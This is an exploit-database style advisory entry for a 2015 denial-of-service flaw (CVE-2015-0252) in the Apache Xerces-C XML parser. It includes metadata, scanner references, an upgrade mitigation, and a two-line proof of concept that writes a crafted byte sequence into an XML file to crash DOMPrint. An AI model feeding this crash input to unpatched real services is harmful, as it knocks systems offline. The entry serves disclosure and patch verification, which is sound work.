vendor:
Xerces-C
by:
beford
7.5
CVSS
HIGH
DoS
119
CWE
Product Name: Xerces-C
Affected Version From: Versions prior to 3.1.2
Affected Version To: Versions prior to 3.1.2
Patch Exists: YES
Related CWE: CVE-2015-0252
CPE: a:apache:xerces-c
Other Scripts:
https://www.infosecmatter.com/nessus-plugin-library/?id=83706, https://www.infosecmatter.com/nessus-plugin-library/?id=84465, https://www.infosecmatter.com/nessus-plugin-library/?id=84445, https://www.infosecmatter.com/nessus-plugin-library/?id=82439, https://www.infosecmatter.com/nessus-plugin-library/?id=82282, https://www.infosecmatter.com/nessus-plugin-library/?id=82285, https://www.infosecmatter.com/nessus-plugin-library/?id=84463, https://www.infosecmatter.com/nessus-plugin-library/?id=90418, https://www.infosecmatter.com/nessus-plugin-library/?id=81983, https://www.infosecmatter.com/nessus-plugin-library/?id=81653
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 15.04
2015
Apache Xerces-C XML Parser (< 3.1.2) DoS POC
I believe this to be the same issue that was reported on CVE-2015-0252, posting this in case anyone is interested in reproducing it. Original advisory: https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt $ printf "xffxfex00x00x3c" > file.xml $ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package Segmentation fault $ ./DOMPrint ./file.xml # ASAN Enabled build
Mitigation:
Upgrade to Apache Xerces-C XML Parser version 3.1.2 or later.